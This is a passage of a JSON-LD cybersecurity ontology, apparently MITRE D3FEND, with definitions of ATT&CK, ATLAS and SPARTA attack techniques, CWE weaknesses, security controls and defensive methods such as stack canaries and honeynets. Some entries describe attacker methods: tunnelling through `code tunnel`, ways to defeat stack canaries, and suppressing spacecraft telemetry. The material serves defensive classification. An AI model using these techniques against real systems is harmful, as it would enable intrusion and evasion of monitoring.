      "d3f:definition": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage.",
      "rdfs:label": "Remote System Information Discovery - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Remote System Information Discovery"
    },
    {
      "@id": "d3f:CWE-1270",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1270",
      "d3f:definition": "The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect.",
      "rdfs:label": "Generation of Incorrect Security Tokens",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:AML.TA0006",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0006",
      "d3f:definition": "The adversary is trying to maintain their foothold via AI artifacts or software.\n\nPersistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\nTechniques used for persistence often involve leaving behind modified ML artifacts such as poisoned training data or manipulated AI models.",
      "rdfs:label": "Persistence - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0006"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Persistence"
    },
    {
      "@id": "d3f:CCI-000066_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization enforces requirements for remote connections to the information system.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000066"
    },
    {
      "@id": "d3f:CacheMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accessed-by": {
        "@id": "d3f:CentralProcessingUnit"
      },
      "d3f:definition": "Cache memory is temporary storage that is more readily available to the processor than the computer's main memory source, located between the main memory and the processor.  It is typically either integrated directly into the CPU chip (level 1 cache) or placed on a separate chip with a bus interconnect with the CPU (level 2 cache).",
      "d3f:may-contain": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:modifies": {
        "@id": "d3f:CacheMemory"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://whatis.techtarget.com/definition/memory"
      },
      "rdfs:label": "Processor Cache Memory",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/CPU_cache"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PrimaryStorage"
        },
        {
          "@id": "_:N6bd36cca3bd94390a64f8ca79b33ffda"
        },
        {
          "@id": "_:Nb8daa95ea9b340089c239fe4476786e2"
        },
        {
          "@id": "_:Nd23018db400c4f10ac0727bf3079cb01"
        }
      ]
    },
    {
      "@id": "_:N6bd36cca3bd94390a64f8ca79b33ffda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accessed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CentralProcessingUnit"
      }
    },
    {
      "@id": "_:Nb8daa95ea9b340089c239fe4476786e2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:Nd23018db400c4f10ac0727bf3079cb01",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CacheMemory"
      }
    },
    {
      "@id": "d3f:Reference-FirewallForProcessingAConnectionlessNetworkPacket_NationalSecurityAgency",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7073196B1"
      },
      "d3f:kb-abstract": "The present invention is a device for and method of accessing a network by initializing a database, an approved list, and a disapproved list; receiving an connectionless network packet; computing a flow tag based on the connectionless network packet; discarding the connectionless network packet and returning to the second step if the flow tag is on the disapproved list; allowing access to the network and returning to the second step if the flow tag is on the approved list; comparing the flow tag to the database if the flow tag is not on the approved list or the disapproved list; discarding the connectionless network packet, adding the flow tag to the disapproved list, and returning to the second step if the database rejects the flow tag; and allowing access to the network, adding the flow tag to the approved list, and returning to the second step if the database accepts the flow tag.",
      "d3f:kb-author": "Patrick W. Dowd, John T. McHenry",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "National Security Agency",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Firewall for processing a connectionless network packet",
      "rdfs:label": "Reference - Firewall for processing a connectionless network packet - National Security Agency"
    },
    {
      "@id": "d3f:CWE-282",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-282",
      "d3f:definition": "The product assigns the wrong ownership, or does not properly verify the ownership, of an object or resource.",
      "rdfs:label": "Improper Ownership Management",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:may-transfer",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-transfer y: The entity x may send the thing y; that is, 'x transfers y' may be true.",
      "rdfs:label": "may-transfer",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:Reference-SecureCachingOfServerCredentials_DellProductsLP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20100107241A1"
      },
      "d3f:kb-abstract": "A credential caching system includes receiving a set of authentication credentials, storing the set of authentication credentials in a credential cache memory, wherein the credential cache memory is coupled with a management controller, and supplying the set of authentication credentials for automatic authentication during a reset or reboot. In the event of a security breach, the credential caching system clears the set of authentication credentials from the credential cache memory so that the set of authentication credentials may no longer be used for a reset or reboot.",
      "d3f:kb-author": "Muhammed K. Jaber, Mukund P. Khatri, Kevin T. Marks, Don Charles McCall",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Dell Products LP",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationCacheInvalidation"
      },
      "d3f:kb-reference-title": "Secure caching of server credentials",
      "rdfs:label": "Reference - Secure caching of server credentials - Dell Products LP"
    },
    {
      "@id": "d3f:T1472",
      "@type": "owl:Class",
      "d3f:attack-id": "T1472",
      "d3f:definition": "An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1643",
      "rdfs:label": "Generate Fraudulent Advertising Revenue - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1643"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Generate Fraudulent Advertising Revenue"
    },
    {
      "@id": "d3f:T1668",
      "@type": "owl:Class",
      "d3f:attack-id": "T1668",
      "d3f:definition": "Adversaries who successfully compromise a system may attempt to maintain persistence by “closing the door” behind them  – in other words, by preventing other threat actors from initially accessing or maintaining a foothold on the same system.",
      "rdfs:label": "Exclusive Control",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:HTMLFile",
      "@type": "owl:Class",
      "d3f:definition": "A document file encoded in HTML.The HyperText Markup Language, or HTML is the standard markup language for documents designed to be displayed in a web browser. It can be assisted by technologies such as Cascading Style Sheets (CSS) and scripting languages such as JavaScript. Web browsers receive HTML documents from a web server or from local storage and render the documents into multimedia web pages. HTML describes the structure of a web page semantically and originally included cues for the appearance of the document.",
      "rdfs:label": "HTML File",
      "rdfs:seeAlso": {
        "@id": "dbr:HTML"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DocumentFile"
      },
      "skos:altLabel": "HTML File"
    },
    {
      "@id": "d3f:T1552.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1552.001",
      "d3f:definition": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.",
      "rdfs:label": "Credentials In Files",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N6c340cd35e294aebad796b2f43d4f63d"
        }
      ]
    },
    {
      "@id": "_:N6c340cd35e294aebad796b2f43d4f63d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1219.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1219.001",
      "d3f:definition": "Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)",
      "rdfs:label": "IDE Tunneling",
      "rdfs:subClassOf": {
        "@id": "d3f:T1219"
      }
    },
    {
      "@id": "d3f:T1499.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1499.002",
      "d3f:definition": "Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.",
      "d3f:produces": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "rdfs:label": "Service Exhaustion Flood",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1498"
        },
        {
          "@id": "d3f:T1499"
        },
        {
          "@id": "_:Nd837b4e76b374afb8c32843885f80b82"
        }
      ]
    },
    {
      "@id": "_:Nd837b4e76b374afb8c32843885f80b82",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:KernelEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving operations at the kernel level of an operating system, encompassing interactions with core system resources such as drivers, modules, system calls, and other privileged processes. Kernel events are critical for understanding low-level system behavior and ensuring the integrity of the operating environment.",
      "rdfs:label": "Kernel Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/kernel_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N7b33c74753f64cb1b8e245555f14c889"
        }
      ]
    },
    {
      "@id": "_:N7b33c74753f64cb1b8e245555f14c889",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "d3f:ConfigurationManagementDatabase",
      "@type": "owl:Class",
      "d3f:definition": "A database used to store configuration records throughout their lifecycle. The Configuration Management System (CMS) maintains one or more CMDBs, and each CMDB stores attributes of configuration items (CIs), and relationships with other CIs.",
      "rdfs:isDefinedBy": {
        "@id": "https://web.archive.org/web/20111201040529/http://www.best-management-practice.com/gempdf/itil_glossary_v3_1_24.pdf"
      },
      "rdfs:label": "Configuration Management Database",
      "rdfs:seeAlso": [
        {
          "@id": "https://dbpedia.org/resource/Configuration_management_database"
        },
        {
          "@id": "https://wiki.en.it-processmaps.com/index.php/ITIL_Glossary/_ITIL_Terms_C#Config_Management_Database_.28CMDB.29"
        },
        {
          "@id": "https://www.dmtf.org/standards/cmdbf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:CCI-002691_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses indicators of compromise.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002691"
    },
    {
      "@id": "d3f:NISTSP800-53ControlCatalog",
      "@type": "owl:Class",
      "d3f:definition": "A NIST SP 800-53 control catalog provides the entire set of security and privacy controls for a version of NIST SP 800-53.",
      "rdfs:label": "NIST SP 800-53 Control Catalog",
      "rdfs:seeAlso": {
        "@id": "https://doi.org/10.6028/NIST.SP.800-53r5"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ControlCatalog"
        },
        {
          "@id": "_:N94f0ff0697824ba79817125f466973d5"
        }
      ]
    },
    {
      "@id": "_:N94f0ff0697824ba79817125f466973d5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-member"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NISTControl"
      }
    },
    {
      "@id": "d3f:DigitalArtifact",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An information-bearing artifact (object) that is, or is encoded to be used with, a digital computer system. This concept is broad to include the literal instances of an artifact, or an implicit summarization of changes to or properties of other artifacts.",
      "d3f:display-baseurl": "/dao/artifact/",
      "d3f:synonym": "Digital Asset",
      "rdfs:label": "Digital Artifact",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Digital_artifactual_value"
        },
        {
          "@id": "dbr:Virtual_artifact"
        },
        {
          "@id": "https://www.iso.org/obp/ui/#iso:std:iso-iec:19770:-1:ed-3:v1:en"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Artifact"
      }
    },
    {
      "@id": "d3f:ConnectedHoneynet",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ConnectedHoneynet"
      ],
      "d3f:d3fend-id": "D3-CHN",
      "d3f:definition": "A decoy service, system, or environment, that is connected to the enterprise network, and simulates or emulates certain functionality to the network, without exposing full access to a production system.",
      "d3f:kb-article": "## How it works\nDecoy honeypots are deployed within the enterprise environment that emulate certain services or portions of an OS to attract attackers.\n\n## Considerations\nA connected honeynet provides a tradeoff between emulating certain functionality but not being as sophisticated as an integrated honeynet. The connected honeynet may not provide enough functionality to detect new attack patterns or zero day exploits but could provide enough functionality for specific known vulnerabilities.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ModificationOfAServerToMimicADeceptionMechanism_AcalvioTechnologiesInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:LocalAreaNetwork"
      },
      "rdfs:label": "Connected Honeynet",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "_:N53835f03005f432681866b4e03dbb650"
        }
      ]
    },
    {
      "@id": "_:N53835f03005f432681866b4e03dbb650",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:StackFrameCanaryValidation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:StackFrameCanaryValidation"
      ],
      "d3f:d3fend-id": "D3-SFCV",
      "d3f:definition": "Comparing a value stored in a stack frame with a known good value in order to prevent or detect a memory segment overwrite.",
      "d3f:kb-article": "## How it works\n\nThis defense must be applied at compile-time, or via a patch to the program binary.  Stack Frame Canary Verification inserts instructions at the prologue and epilogue of desired functions.  In the prologue, a canary value, typically with the same size as the register size, is stored in the system of record and on the stack.  Typically, the canary is loaded to where it has a memory address just below that of the saved instruction pointer and base pointer.  In the epilogue, the canary value stored on the stack and, is compared to the canary value in the system of record.  If the values are different, other techniques such as those in Process Eviction might be invoked, such as Process Termination to end the current process, or Executable Blacklisting to blacklist the potentially vulnerable or malfunctioning executable.\n\nStack Frame Canary Verification is commonly used to detect potential tampering of a saved register value on the stack before it has been restored.  Examples of registers with values commonly saved to the stack include the instruction pointer and the base pointer.\n\nThe canary should be stored between where the start of a buffer overrun is likely, and the data to protect, in cases where the buffer size increases it will overwrite the data to be protected.\n\nOn most processor architectures, including x86, x64, and ARM, a \"push\" operation to store data to the stack grows the stack towards a lower memory address.  As in these architectures, saved register values are stored to the stack at a point in time just before space is made for the local function variables, the saved register values have a higher address than that of the local function variables.  
Values at increasing indexes of a buffer are written to increasing memory addresses; therefore, an overwrite in the local variable buffer could overwrite saved register values, and a stack canary between these two would be useful in detecting an overwrite.\n\nOn some other processor architectures such as the B5000, the stack grows towards increasing memory addresses, and some architectures, such as System Z and RCA1802A, stack direction can be chosen.  If the stack grows towards increasing memory addresses, while this architecture inherently provides more protection against a saved register being overwritten, other data including local function variables might be overwritten.\n\n\n## Considerations\n\nThere are several ways that the protection provided by a canary could be rendered ineffective.\n\n### Performing a malicious action before the canary is checked\n\nIf the attacker alters the memory in such a way that it performs a malicious action before the epilogue is called, then this protection will not be effective.  This includes altering the logic of the program by altering the values of local variables stored on the function stack, or by causing an exception and exploiting the exception mechanism such as the SEH (Structured Exception Handling) mechanism on Windows.\n\n### Determining the canary value\n\nDetermining the canary value is possible through reading memory either for the code used to check the canary, or from the stored canary value itself in a stack frame.\n\n### Changing the canary value\n\nA vulnerability such as a write-what-where condition that allows one to write data after the canary in the stack, would allow control of the value of the saved instruction pointer without needing to know the canary value.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-GS_BufferSecurityCheck_MicrosoftDocs"
        },
        {
          "@id": "d3f:Reference-StackSmashingProtection_StackGuard_RedHat"
        }
      ],
      "d3f:validates": {
        "@id": "d3f:StackFrame"
      },
      "rdfs:label": "Stack Frame Canary Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N556de90163784d8ab02041bf8f4e384e"
        }
      ]
    },
    {
      "@id": "_:N556de90163784d8ab02041bf8f4e384e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:CWE-232",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-232",
      "d3f:definition": "The product does not handle or incorrectly handles when a value is not defined or supported for the associated parameter, field, or argument name.",
      "rdfs:label": "Improper Handling of Undefined Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-229"
      }
    },
    {
      "@id": "d3f:CWE-707",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-707",
      "d3f:definition": "The product does not ensure or incorrectly ensures that structured messages or data are well-formed and that certain security properties are met before being read from an upstream component or sent to a downstream component.",
      "rdfs:label": "Improper Neutralization",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:T1027.011",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.011",
      "d3f:definition": "Adversaries may store data in \"fileless\" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)",
      "rdfs:label": "Fileless Storage",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:DE-0003.06",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.06",
      "d3f:definition": "Spacecraft expose modes that control what telemetry is sent and how, real-time channels, recorder playback, beacon/summary only, event-driven reporting, and per-virtual-channel/APID selections. By switching modes or editing the associated parameters (rates, filters, playback queues, index ranges), an adversary can thin, defer, or reroute observability. Typical effects include suppressing high-rate engineering streams in favor of minimal beacons, delaying playback of time periods of interest, replaying benign segments, or redirecting packets to alternate virtual channels that are not routinely monitored. Telemetry continues to flow, but it no longer reflects the activity the operators need to see.",
      "d3f:modifies": {
        "@id": "d3f:OperatingMode"
      },
      "rdfs:label": "Telemetry Downlink Modes - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/06/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:Nbcacbd73dde5443f9aa751592af0509f"
        }
      ],
      "skos:prefLabel": "Telemetry Downlink Modes"
    },
    {
      "@id": "_:Nbcacbd73dde5443f9aa751592af0509f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:CCI-002289_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports the association of organization-defined security attributes with organization-defined subjects by authorized individuals (or processes acting on behalf of individuals).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002289"
    },
    {
      "@id": "d3f:ProcessSetUserIDEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process changes or adopts a specific user identity, modifying its access privileges or operational context.",
      "rdfs:label": "Process Set User ID Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:Nd6afee43807440269eeca1e0582e4323"
        }
      ]
    },
    {
      "@id": "_:Nd6afee43807440269eeca1e0582e4323",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:copies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x copies y: A technique or agent x reproduces or makes an exact copy of some digital artifact y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01738810-v"
      },
      "rdfs:label": "copies",
      "rdfs:subPropertyOf": {
        "@id": "d3f:creates"
      }
    },
    {
      "@id": "d3f:CWE-196",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-196",
      "d3f:definition": "The product uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive.",
      "rdfs:label": "Unsigned to Signed Conversion Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-681"
      }
    },
    {
      "@id": "d3f:d3fend-id",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Unique identifier for a D3FEND technique. D3-[Acronym].",
      "rdfs:label": "d3fend-id",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:NetworkSensor",
      "@type": "owl:Class",
      "d3f:definition": "A Network Sensor monitors network traffic and communication patterns.",
      "rdfs:label": "Network Sensor",
      "rdfs:subClassOf": {
        "@id": "d3f:CyberSensor"
      }
    },
    {
      "@id": "d3f:Reference-OutlierParentsOfCmd_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-002/"
      },
      "d3f:kb-abstract": "Many programs create command prompts as part of their normal operation including malware used by attackers. This analytic attempts to identify suspicious programs spawning cmd.exe by looking for programs that do not normally create cmd.exe.\n\nWhile this analytic does not take the user into account, doing so could generate further interesting results. It is very common for some programs to spawn cmd.exe as a subprocess, for example to run batch files or windows commands. However many process don't routinely launch a command prompt - for example Microsoft Outlook. A command prompt being launched from a process that normally doesn't launch command prompts could be the result of malicious code being injected into that process, or of an attacker replacing a legitimate program with a malicious one.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-002: Outlier Parents of Cmd",
      "rdfs:label": "Reference - CAR-2014-11-002: Outlier Parents of Cmd - MITRE"
    },
    {
      "@id": "d3f:BlockDevice",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Partition"
        },
        {
          "@id": "d3f:PartitionTable"
        }
      ],
      "d3f:definition": "A block device (or block special file) provides buffered access to hardware devices, and provides some abstraction from their specifics.\n\nIEEE Std 1003.1-2017: A file that refers to a device. A block special file is normally distinguished from a character special file by providing access to the device in a manner such that the hardware characteristics of the device are not visible.",
      "d3f:may-contain": {
        "@id": "d3f:Volume"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Device_file#BLOCKDEV"
      },
      "rdfs:label": "Block Device",
      "rdfs:seeAlso": {
        "@id": "https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_79"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N69ac1148b54741f59109b6630fe82d21"
        },
        {
          "@id": "_:N04323496683747f0b4f2842c1f39667f"
        },
        {
          "@id": "_:N17633b7f264c48edb65bc0600850c1d8"
        },
        {
          "@id": "_:N12b3a0f6705f4961aaf74ce5fe44fedb"
        }
      ],
      "skos:altLabel": "Block Special File"
    },
    {
      "@id": "_:N69ac1148b54741f59109b6630fe82d21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:N04323496683747f0b4f2842c1f39667f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Partition"
      }
    },
    {
      "@id": "_:N17633b7f264c48edb65bc0600850c1d8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "_:N12b3a0f6705f4961aaf74ce5fe44fedb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Volume"
      }
    },
    {
      "@id": "d3f:T1046",
      "@type": "owl:Class",
      "d3f:attack-id": "T1046",
      "d3f:definition": "Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)",
      "rdfs:label": "Network Service Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:Switch",
      "@type": "owl:Class",
      "d3f:definition": "A network switch (also called switching hub, bridging hub, and by the IEEE MAC bridge) is networking hardware that connects devices on a computer network by using packet switching to receive and forward data to the destination device. A network switch is a multiport network bridge that uses MAC addresses to forward data at the data link layer (layer 2) of the OSI model. Some switches can also forward data at the network layer (layer 3) by additionally incorporating routing functionality. Such switches are commonly known as layer-3 switches or multilayer switches.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_switch"
      },
      "rdfs:label": "Switch",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      },
      "skos:altLabel": [
        "Bridging Hub",
        "MAC Bridge",
        "Network Switch",
        "Switching Hub"
      ]
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProvidingAnonymousRemailingAndFilteringOfElectronicMail_Nokia",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/JPH11161574A"
      },
      "d3f:kb-abstract": "To make anonymous a sender name present on an actual transmission source address by including an alias transmission source address substitution unit and removing the actual transmission source address from an electronic mail message. SOLUTION: A hash value of the destination address of an electronic mail message is calculated (S330). Then, (n) blank bytes are added to a compressed actual transmission source address (S340). The true length of the actual transmission source address is hidden by adding blank bytes. Further, a 2nd bit field is added to a secret key saved locally in a remailer, and an extended secret key characteristic of the destination address is generated. Then, the compressed actual transmission source address is ciphered according to the data ciphering standards using the extended secret key characteristic of the destination address as a cipher key (S350). Further, the 2nd bit field is added to the ciphered and compressed actual transmission source address (S360).",
      "d3f:kb-author": "Eran Gabber, Phillip B Gibbons, David Morris Kristol, Yossi Matias, Alain J Mayer",
      "d3f:kb-organization": "Nokia of America Corp",
